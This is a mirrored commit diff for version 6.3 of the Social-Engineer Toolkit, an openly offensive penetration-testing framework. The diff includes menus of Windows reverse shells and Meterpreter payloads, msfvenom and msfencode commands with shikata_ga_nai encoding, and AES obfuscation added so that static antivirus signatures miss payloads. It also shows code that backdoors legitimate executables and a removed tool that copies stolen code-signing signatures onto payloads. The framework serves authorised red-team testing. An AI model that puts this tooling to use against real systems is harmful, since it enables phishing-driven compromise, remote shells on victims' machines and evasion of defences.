Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-02-17 05:48:46 +00:00
Code Issues Projects Releases Packages Wiki Activity

Multiple bug fixes and updates for version 6.3 release

Browse source
This commit is contained in:
root 2015-04-09 21:58:04 -04:00
parent 6cf475c798
commit 49a7cbc5d4
18 changed files with 166 additions and 372 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
readme/CHANGES
View file

@ -1,3 +1,26 @@
~~~~~~~~~~~~~~~~
version 6.3
~~~~~~~~~~~~~~~~
* removed old payloads that were no longer needed - pyinjector and multipyinjector to the job, standard meterpreter payloads all get picked up regardless of encoding
* fixed an issue causing PDF templates from not being properly created when selecting solo
* added ability for custom exe to properly execute when deploy binaries is still specified to OFF (it has to)
* rewrote java applet to incorporate custom binary selection
* added check to deploy binaries to auto select yes parameter 8 automatically
* removed disitools from SET - no longer needed in custom binary
* removed legit binary, no longer needed
* removed three config options no longer needed
* defaulted the memory injection technique as the main method for old payloads
* added additional obfuscation around AES generation and making sure static sigs cant hit it
* stablized MSSQL bruter and injection through powershell
* fixed webjacking that would cause the menu to bomb out if invalid responses
* fixed an issue when importing a custom payload, it would try to kick off a listener which it shouldnt
* added additional wording about when specifying a custom payload that you will need to create your own listener
* added flag replacement variable for param name 8 which will indicate a randomized four alphanumeric for custom payload delivery - this will allow custom payloads to function properly without triggering powershell or other exploitation methods
* added the ability for powershell to execute first and if successful then not drop binary stager as last resort
* added a workaround for a metasploit bug that would cause bundle install issues when launching directly within the /opt/metasploit/apps/pro/msf3 directory or within the /usr/share/ framework directory. I first check for /usr/bin/msfconsole first and if there I do not append to the path variable in order to launch from anywhere
* added ability to use default msfconsole launcher if applicable from any path instead of from home directory - fixed in psexec, powershell injection, java applet, custom payloads, etc.
~~~~~~~~~~~~~~~~
version 6.2
~~~~~~~~~~~~~~~~

2
src/autorun/autorun.py
View file

@ -74,7 +74,7 @@ if trigger == 2 or trigger == 3:
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j")
filewrite.close()
subprocess.Popen("ruby %s/msfconsole -L -r %s/meta_config" % (msf_path, setdir), shell=True).wait()
subprocess.Popen("%smsfconsole -L -r %s/meta_config" % (msf_path, setdir), shell=True).wait()
else:
print_warning("cancelling...")
sleep (2)

22
src/core/dictionaries.py
View file

@ -99,22 +99,12 @@ def ms_payload_2(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
'3':"windows/vncinject/reverse_tcp",
'4':"windows/shell_bind_tcp",
'5':"windows/x64/shell_bind_tcp",
'6':"windows/x64/shell_reverse_tcp",
'7':"windows/x64/meterpreter/reverse_tcp",
'8':"windows/meterpreter/reverse_tcp_allports",
'9':"windows/meterpreter/reverse_https",
'10':"windows/meterpreter/reverse_tcp_dns",
'11':"set/reverse_shell",
'12':"set/reverse_shell",
'13':"set/reverse_shell",
'14':"shellcode/alphanum",
'15':"shellcode/pyinject",
'16':"shellcode/multipyinject",
'1':"shellcode/pyinject",
'2':"shellcode/multipyinject",
'3':"set/reverse_shell",
'4':"set/reverse_shell",
'5':"set/reverse_shell",
'6':"shellcode/alphanum",
}.get(payload,"ERROR")
def ms_payload_3(payload):

0
src/core/digitalsig/__init__.py
View file

BIN
src/core/digitalsig/digital.signature
View file

Binary file not shown.

155
src/core/digitalsig/disitool.py
View file

@ -1,155 +0,0 @@
#!/usr/bin/env python
#
# Notes from rel1k here... Had to downgrade to 0.1, the latest (0.3 currently) uses a different way for checksums of the peheader.
# This dies and fails in 64 bit operating systems, since this is the older version, shouldn't be a big deal, still works as expected.
#
"""V0.1 2007/12/18 - 2008/01/09
tool to manipulate digital signatures in PE files
commands:
- delete signed-file unsigned-file
- copy signed-source-file unsigned-file signed-file
- extract signed-file signature
- add signature unsigned-file signed-file
Source code put in public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2007/12/21: added arguments
2008/01/09: code review
requires pefile:
http://code.google.com/p/pefile/
to install: setup.py install
"""
import pefile
import sys
from struct import *
def Usage():
"""Displays the usage of this tool
"""
print "Usage: disitool command [options] file ..."
print " disitool V0.1, tool to manipulate digital signatures in PE files"
print " commands:"
print " - delete signed-file unsigned-file"
print " - copy signed-source-file unsigned-file signed-file"
print " - extract signed-file signature"
print " - add signature unsigned-file signed-file"
print " Source code put in the public domain by Didier Stevens, no Copyright"
print " Use at your own risk"
print " https://DidierStevens.com"
def DeleteDigitalSignature(SignedFile, UnsignedFile=None):
"""Deletes the digital signature from file SignedFile
When UnsignedFile is not None, writes the modified file to UnsignedFile
Returns the modified file as a PE file
"""
pe = pefile.PE(SignedFile)
address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress = 0
pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size = 0
if address != 0:
new_file_data = pe.write()[0:address]
else:
new_file_data = pe.write()
if UnsignedFile:
f = file(UnsignedFile, 'wb+')
f.write(new_file_data)
f.close()
return new_file_data
def CopyDigitalSignature(SignedSourceFile, UnsignedFile, SignedFile=None):
"""Extracts the digital signature from file SignedSourceFile and adds it to file UnsignedFile
When SignedFile is not None, writes the modified file to SignedFile
Returns the modified file as a PE file
"""
peSignedSource = pefile.PE(SignedSourceFile)
address = peSignedSource.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
size = peSignedSource.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size
if address == 0:
print "Error: source file not signed"
return
signature = peSignedSource.write()[address:]
peUnsigned = DeleteDigitalSignature(UnsignedFile)
peSignedFile = pefile.PE(data=''.join(list(peUnsigned) + list(signature)))
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress = len(peUnsigned)
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size = size
new_file_data = peSignedFile.write()
if SignedFile:
f = file(SignedFile, 'wb+')
f.write(new_file_data)
f.close()
return new_file_data
def ExtractDigitalSignature(SignedFile, SignatureFile=None):
"""Extracts the digital signature from file SignedFile
When SignatureFile is not None, writes the signature to SignatureFile
Returns the signature
"""
pe = pefile.PE(SignedFile)
address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
size = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size
if address == 0:
print "Error: source file not signed"
return
signature = pe.write()[address+8:]
if SignatureFile:
f = file(SignatureFile, 'wb+')
f.write(signature)
f.close()
return signature
def AddDigitalSignature(SignatureFile, UnsignedFile, SignedFile=None):
"""Adds the digital signature from file SignatureFile to file UnsignedFile
When SignedFile is not None, writes the modified file to SignedFile
Returns the modified file as a PE file
"""
f = file(SignatureFile, 'rb')
signature = f.read()
f.close()
size = len(signature) + 8
peUnsigned = DeleteDigitalSignature(UnsignedFile)
peSignedFile = pefile.PE(data=''.join(list(peUnsigned) + list(unpack("4c", pack("i", size))) + ['\x00', '\x02', '\x02', '\x00'] + list(signature)))
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress = len(peUnsigned)
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size = size
new_file_data = peSignedFile.write()
if SignedFile:
f = file(SignedFile, 'wb+')
f.write(new_file_data)
f.close()
return new_file_data

14
src/core/menu/text.py
View file

@ -238,22 +238,12 @@ infectious_text = """
if operating_system != "windows":
if msf_path != False:
payload_menu_1 = [
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Bind Shell Execute payload and create an accepting port on remote system',
'Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline',
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
'Windows Meterpreter All Ports Spawn a meterpreter shell and find a port home (every port)',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter',
'Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through PyInjector',
'Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via memory',
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
'PyInjector Shellcode Injection This will drop a meterpreter payload through PyInjector',
'MultiPyInjector Shellcode Injection This will drop multiple Metasploit payloads via memory',
'Import your own executable Specify a path for your own executable\n']
if operating_system == "windows" or msf_path == False:

8
src/core/msf_attacks/create_payload.py
View file

@ -167,7 +167,7 @@ if exploit_counter == 0:
# START THE EXE TO VBA PAYLOAD
if exploit != 'custom/exe/to/vba/payload':
outfile = setdir + "/%s" % (outfile)
subprocess.Popen("ruby %s/msfcli %s PAYLOAD=%s LHOST=%s LPORT=%s OUTPUTPATH=%s FILENAME=%s %s ENCODING=shikata_ga_nai %s E" % (meta_path,exploit,payload,rhost,lport,outpath,outfile,target,inputpdf), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
subprocess.Popen("%s/msfcli %s PAYLOAD=%s LHOST=%s LPORT=%s OUTPUTPATH=%s FILENAME=%s %s ENCODING=shikata_ga_nai %s E" % (meta_path,exploit,payload,rhost,lport,outpath,outfile,target,inputpdf), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp " + users_home + "/.msf4/local/%s %s" % (filename_code, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
print_status("Payload creation complete.")
time.sleep(1)
@ -181,9 +181,9 @@ if exploit_counter == 0:
if noencode == 1:
execute1=("exe")
payloadname=("vb.exe")
subprocess.Popen("ruby %s/msfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True).wait()
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True).wait()
if noencode == 0:
subprocess.Popen("ruby %s/msfencode -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True).wait()
subprocess.Popen("%smsfencode -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True).wait()
# Create the VB script here
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % (meta_path,setdir,setdir), shell=True).wait()
print_info("Raring the VBS file.")
@ -256,7 +256,7 @@ if exploit == "dll_hijacking":
if not os.path.isfile("%s/fileformat.file" % (setdir)):
print_info("This may take a few to load MSF...")
try:
child1=pexpect.spawn("ruby %s/msfconsole -L -r %s/meta_config" % (meta_path,setdir))
child1=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (meta_path,setdir))
except:
try:
child1.close()

201
src/core/payloadgen/create_payloads.py
View file

@ -32,49 +32,21 @@ stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off": stage_encoding = "false"
else: stage_encoding = "true"
# grab configuration options
encount="4"
configfile=file("%s/config/set_config" % (definepath),"r").readlines()
# check the metasploit path
msf_path = meta_path()
# check the config files for all of the flags needed for the file
encount=check_config("ENCOUNT=")
auto_migrate=check_config("AUTO_MIGRATE=")
digital_steal=check_config("DIGITAL_SIGNATURE_STEAL=")
meterpreter_multi = check_config("METERPRETER_MULTI_SCRIPT=")
linux_meterpreter_multi=check_config("LINUX_METERPRETER_MULTI_SCRIPT=")
meterpreter_multi_command=check_config("METERPRETER_MULTI_COMMANDS=")
meterpreter_multi_command = meterpreter_multi_command.replace(";", "\n")
linux_meterpreter_multi_command = check_config("LINUX_METERPRETER_MULTI_COMMANDS=")
linux_meterpreter_multi_command = linux_meterpreter_multi_command.replace(";", "\n")
upx_encode = check_config("UPX_ENCODE=")
upx_path = check_config("UPX_PATH=")
if operating_system != "windows":
if not os.path.isfile(upx_path):
print_error("ERROR: UPX packer was not found. Disabling UPX packing.")
upx_encode = "OFF"
unc_embed = check_config("UNC_EMBED=")
# add the digital signature stealing
if digital_steal == "ON":
try:
debug_msg(me,"importing Python module 'pefile'",1)
try: reload(pefile)
except: import pefile
sys.path.append("src/core/digitalsig/")
debug_msg(me,"importing 'src.core.digitalsig.disitool'",1)
try: reload(disitool)
except: import disitool
except ImportError:
if operating_system != "windows":
print_error("Error:PEFile not detected. You must download it from http://code.google.com/p/pefile/")
print_warning("Turning the digital signature stealing flag off... A/V Detection rates may be lower.")
digital_steal = "OFF"
attack_vector=0
linosx=0
multiattack=""
@ -97,29 +69,15 @@ multiattack_java="off"
if os.path.isfile(setdir + "/multi_java"):
multiattack_java="on"
# grab binary path if needed
fileopen=file("config/set_config", "r")
for line in fileopen:
match=re.search("CUSTOM_EXE=", line)
if match:
line=line.rstrip()
line=line.replace("CUSTOM_EXE=", "")
custom_exe=line
if custom_exe == "legit.binary": custom_exe="src/payloads/exe/legit.binary"
# custom payloadgen
payloadgen="regular"
if os.path.isfile(setdir + "/payloadgen"):
payloadgen="solo"
# set ipquestion to blank until otherwise pulled
ipquestion=""
####################################################################################################################################
# grab ipaddr if it hasn't been identified yet
####################################################################################################################################
if check_options("IPADDR=") == False:
fileopen=file("config/set_config", "r")
data = fileopen.read()
@ -149,8 +107,8 @@ try:
# Specify path to metasploit
path=msf_path
# Specify payload
# this is encoding
encode=""
# this is payload
choice1=""
@ -179,27 +137,16 @@ try:
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
choice1 = raw_input(setprompt(["4"], ""))
if operating_system == "windows" or msf_path == False:
# default blank then select SETSHELL
# default blank then select pyinjector
if choice1 == "":
choice1 = "11"
# if we specify choice 1, thats SETSHELL
if choice1 == "1":
choice1 == "11"
# if we specify choice 2, thats the SET reverse http shell
if choice1 == "2":
choice1 = "12"
# selecting ratte
if choice1 == "3":
choice1 = "13"
choice1 = "1"
# if they specified something else that wasn't there just default to SETSHELL
else: choice1 = "11"
# check the length and make sure it works
if choice1 != "":
choice1 = check_length(choice1,17)
choice1 = check_length(choice1,7)
# convert it to a string
choice1 = str(choice1)
custom=0
counter=0
flag=0
@ -212,38 +159,39 @@ try:
exit_set()
if choice1 == '':
choice1 = ("11")
choice1 = ("1")
if choice1 == '5' or choice1 == '6' or choice1 == '7':
encode_stop = 1
encode = ""
if choice1 == '8':
if choice1 == '7':
flag = 1
# here we specify shellcodeexec
if choice1 == '14' or choice1 == '15' or choice1 == '16':
if choice1 == '1' or choice1 == '2' or choice1 == '6':
encode_stop = 1
encode = 0
# 11 is the set interactive shell, 12 is set rev http shell and 13 is ratte listener
if choice1 == '11' or choice1 == '12' or choice1 == "13":
if choice1 == '3' or choice1 == '4' or choice1 == "5":
encoder = 'false'
payloadgen = 'solo'
encode_stop = 1
filewrite = file(setdir + "/set.payload", "w")
# select setshell
if choice1 == '11':
if choice1 == '3':
filewrite.write("SETSHELL")
# select setshell_reverse
if choice1 == '12':
if choice1 == '4':
filewrite.write("SETSHELL_HTTP")
# select ratte
if choice1 == '13':
if choice1 == '5':
filewrite.write("RATTE")
filewrite.close()
if choice1 != "17":
if choice1 != "7":
# if not then import the payload selection
choice1 = ms_payload_2(choice1)
@ -252,7 +200,7 @@ try:
courtesyshell=("")
# if custom
if choice1=='17':
if choice1=='7':
print_info("Example: /root/custom.exe")
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if not os.path.isfile(choice1):
@ -261,6 +209,7 @@ try:
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1):
break
update_options("CUSTOM_EXE=%s" % (choice1))
custom=1
@ -287,40 +236,6 @@ try:
filewrite.write(data)
filewrite.close()
if custom == 0:
if encode_stop == 0 and encode != "16" and choice1 != "set/reverse_shell":
###################################################
# USER INPUT: SHOW ENCODER MENU #
###################################################
debug_msg (me,"printing 'text.encoder_menu'",5)
show_encoder_menu = create_menu(encoder_text, encoder_menu)
encode = raw_input(setprompt(["18"], ""))
encoder="true"
if encode == 'exit':
exit_set()
# turn off some options if fasttrack is in use
if os.path.isfile(setdir + "/fasttrack.options"):
upx_encode == "OFF"
encode = "2"
encoder = "true"
# Handle special cases
if encode=='' or encode == ' ': encode = '1'
if encode == '1':
encount="4"
if encode=='14' or encode == '0': encoder="false"
# do dictionary lookup
encode1 = encoder_type(encode)
encode = "x86/" + encode1
if encode == "x86/MULTIENCODE" or encode == "x86/BACKDOOR":
encode = encode.replace("x86/", "")
# Specify Remote Host if ipaddr.file is missing (should never get here)
if check_options("IPADDR=") == 0:
choice2=raw_input(setprompt(["4"], "IP Address of the listener/attacker (reverse) or host/victim (bind shell)"))
@ -328,17 +243,11 @@ try:
choice2 = check_options("IPADDR=")
# grab interface ip address
if os.path.isfile(setdir + "/interface"):
fileopen=file(setdir + "/interface", "r").readlines()
for line in fileopen:
line=line.rstrip()
ipquestion=line
# specify the port for the listener
if choice3 == "":
if choice1 != "shellcode/multipyinject":
choice3=raw_input(setprompt(["4"], "PORT of the listener [443]"))
if custom == 0:
choice3=raw_input(setprompt(["4"], "PORT of the listener [443]"))
# here we check if the user really wants to use port 80
if choice3 == "80":
@ -384,10 +293,11 @@ try:
# if we aren't using the set reverse shell
if choice1 != "set/reverse_shell":
# if we aren't using shellcodeexec
if choice1 != "shellcode/alphanum":
if choice1 != "shellcode/pyinject":
if choice1 != "shellcode/multipyinject":
generatepayload=subprocess.Popen(r"ruby %s/msfvenom -p %s LHOST=%s %s --format %s > %s %s" % (path,choice1,choice2,portnum,choice4,setdir,msf_filename), shell=True).wait()
#if choice1 != "shellcode/alphanum":
# if choice1 != "shellcode/pyinject":
# if choice1 != "shellcode/multipyinject":
# generatepayload=subprocess.Popen(r"ruby %s/msfvenom -p %s LHOST=%s %s --format %s > %s %s" % (path,choice1,choice2,portnum,choice4,setdir,msf_filename), shell=True).wait()
# if we are using shellcodeexec
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
@ -467,7 +377,6 @@ try:
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
# fix port num
if "multipyinject" in choice1:
portnum = shellcode_port
@ -511,7 +420,7 @@ try:
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
print_status("Encrypting the shellcode via 256 AES encryption..")
print_status("Encrypting the shellcode via AES 256 encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
@ -520,10 +429,8 @@ try:
filewrite.close()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# close the pyinjector file for ports and payload
payload_options.close()
# here we are going to encode the payload via base64
fileopen = file("%s/meterpreter.alpha_decoded" % (setdir), "r")
data = fileopen.read()
@ -570,10 +477,6 @@ try:
if choice1 == "shellcode/multipyinject":
fileopen = file("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb")
filewrite = file("%s/shellcodeexec.custom" % (setdir), "wb")
data = fileopen.read()
filewrite.write(data.replace("UPX", random_string, 4))
filewrite.close()
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
# we need to read in the old index.html file because its already generated, need to present the alphanum to it
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
@ -620,6 +523,7 @@ try:
print_status("Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.")
setshell_counter = 1
if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
try: reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
@ -636,50 +540,22 @@ try:
deploy_binaries = check_config("DEPLOY_BINARIES=")
if deploy_binaries.lower() == "n" or deploy_binaries.lower() == "no":
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
if deploy_binaries.lower() == "y" or deploy_binaries.lower() == "yes":
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir,setdir), stdout=subprocess.PIPE, shell=True)
if encoder == "true":
# If not option 16 or default then go here
if encode != "MULTIENCODE":
if encode != "BACKDOOR":
print_info("Encoding the payload %s times. [-]\n" % (str(encount)))
encodepayload=subprocess.Popen(r"ruby %s/msfencode < %s/1msf.exe -e %s -o %s/msf.exe -t exe -c %s" % (path,setdir,encode,setdir,encount), shell=True).wait()
# If option 16 or default then go here
if encode == "MULTIENCODE":
print_info("Encoding the payload multiple times to get around pesky Anti-Virus.")
encodepayload=subprocess.Popen(r"ruby %s/msfencode -e x86/shikata_ga_nai -i %s/1msf.exe -t raw -c 5 | ruby %s/msfencode -t raw -e x86/alpha_upper -c 2 | ruby %s/msfencode -t raw -e x86/shikata_ga_nai -c 5 | ruby %s/msfencode -t exe -c 5 -e x86/countdown -o %s/msf.exe" % (path,setdir,path,path,path,setdir), shell=True).wait()
encode1=("x86/countdown")
# If option 16, backdoor executable better AV avoidance
if encode == "BACKDOOR":
print_info("Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...")
backdoor_execution = check_config("BACKDOOR_EXECUTION=").lower()
if backdoor_execution == "on": backdoor_execution = "-k"
if backdoor_execution != "on": backdoor_execution = ""
subprocess.Popen("cp %s %s/legit.exe 1> /dev/null 2> /dev/null" % (custom_exe,setdir), shell=True).wait()
encodepayload=subprocess.Popen(r"ruby %s/msfvenom -p %s LHOST=%s %s -c 10 -e x86/shikata_ga_nai -x %s/legit.exe --format exe > %s/msf.exe" % (path,choice1,choice2,portnum,path,setdir,setdir), shell=True).wait()
print_status("Backdoor completed successfully. Payload is now hidden within a legit executable.")
# define to use UPX or not
if upx_encode == "ON":
if choice1 != "set/reverse_shell":
print_status("UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.")
upx("%s/msf.exe" % (setdir))
# define to use digital signature stealing or not
if digital_steal == "ON":
print_status("Digital Signature Stealing is ON, hijacking a legit digital certificate")
disitool.CopyDigitalSignature("src/core/digitalsig/digital.signature", setdir + "/msf.exe", setdir + "/msf2.exe")
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe" % (setdir,setdir), shell=True).wait()
encode1=("x86/shikata_ga_nai")
if choice1 == 'windows/shell_bind_tcp' or choice1 == 'windows/x64/shell_bind_tcp' :
print_info("When the payload is downloaded, you will want to connect to the victim directly.")
# here we specify the binary to deploy if we are using ones that are required to drop binaries
if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum":
fileopen3 = fileopen = file("%s/web_clone/index.html" % (setdir), "r")
filewrite = file("%s/web_clone/index.html.new" % (setdir), "w")
data = fileopen3.read()
# check if we don't want to deploy binaries
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# specify attack vector as SET interactive shell
if choice1 == "set/reverse_shell": attack_vector = "set_payload"
@ -708,7 +584,6 @@ try:
osx_path = raw_input("Enter the path for the custom OSX payload (blank for nothing): ")
if os.path.isfile(osx_path): break
if osx_path != "":
# copy the payload
shutil.copyfile(osx_path, setdir + "/mac.bin")
@ -726,8 +601,8 @@ try:
# copy the payload
shutil.copyfile(lin_path, setdir + "/nix.bin")
else:
port2=check_config("LINUX_REVERSE_PORT=")
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")

2
src/core/payloadgen/solo.py
View file

@ -27,7 +27,7 @@ if choice == "YES":
if os.path.isfile(setdir + "/meta_config_multipyinjector"):
listen_path = (setdir + "/meta_config_multipyinjector")
subprocess.Popen("ruby %s/msfconsole -L -r %s" % (meta_path,listen_path), shell=True).wait()
subprocess.Popen("%s/msfconsole -r %s" % (meta_path,listen_path), shell=True).wait()
# if we did select the set payload as our option
if os.path.isfile(setdir + "/set.payload"):

13
src/core/setcore.py
View file

@ -230,7 +230,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '6.2'
define_version = '6.3'
return define_version
class create_menu:
@ -295,15 +295,16 @@ def meta_path():
if os.path.isfile("/opt/metasploit/msf3/msfconsole"):
msf_path = "/opt/metasploit/msf3/"
trigger = 1
if os.path.isfile("/usr/bin/msfconsole"):
msf_path = ""
trigger = 1
# specific for pwnpad and pwnplug (pwnie express)
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
msf_path = "/opt/metasploit-framework"
msf_path = "/opt/metasploit-framework/"
trigger = 1
if os.path.isfile("/usr/bin/msfconsole"):
msf_path = ""
trigger = 1
if trigger == 0:
if check_os() != "windows":
check_metasploit = check_config("METASPLOIT_MODE=").lower()
@ -764,7 +765,7 @@ def show_banner(define_version,graphic):
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Recharge""" + bcolors.BLUE + """' [---]
[---] Codename: '""" + bcolors.YELLOW + """#HugLife""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@HackingDave""" + bcolors.BLUE+""" [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]

2
src/fasttrack/psexec.py
View file

@ -79,7 +79,7 @@ try:
msf_path = meta_path()
# launch metasploit below
print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
subprocess.Popen("%smsfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
# handle exceptions
except Exception, e:

35
src/html/spawn.py
View file

@ -22,6 +22,23 @@ if applet_name == "":
applet_name = generate_random_string(6, 15) + ".jar"
update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if check_options("CUSTOM_EXE="):
custom = 1
print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
# here we need to modify the java applet to recognize custom attribute
fileopen3 = fileopen = file("%s/web_clone/index.html" % (setdir), "r")
filewrite = file("%s/web_clone/index.html.new" % (setdir), "w")
data = fileopen3.read()
data = data.replace('param name="8" value="YES"', 'param name="8" value="CUST"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir,setdir), shell=True).wait()
# set current path
definepath=os.getcwd()
@ -493,14 +510,18 @@ try:
meta_config = "meta_config"
if os.path.isfile(setdir + "/meta_config_multipyinjector"):
meta_config = "meta_config_multipyinjector"
child1=pexpect.spawn("ruby %s/msfconsole -L -r %s/%s" % (msf_path,setdir,meta_config))
# check if we want to deliver emails or track users that click the link
webattack_email = check_config("WEBATTACK_EMAIL=").lower()
if webattack_email == "on" or track_email == "on":
try: reload(src.phishing.smtp.client.smtp_web)
except: import src.phishing.smtp.client.smtp_web
# if we arent using a custom payload
if custom != 1:
child1=pexpect.spawn("%smsfconsole -r %s/%s" % (msf_path,setdir,meta_config))
# check if we want to deliver emails or track users that click the link
webattack_email = check_config("WEBATTACK_EMAIL=").lower()
if webattack_email == "on" or track_email == "on":
try: reload(src.phishing.smtp.client.smtp_web)
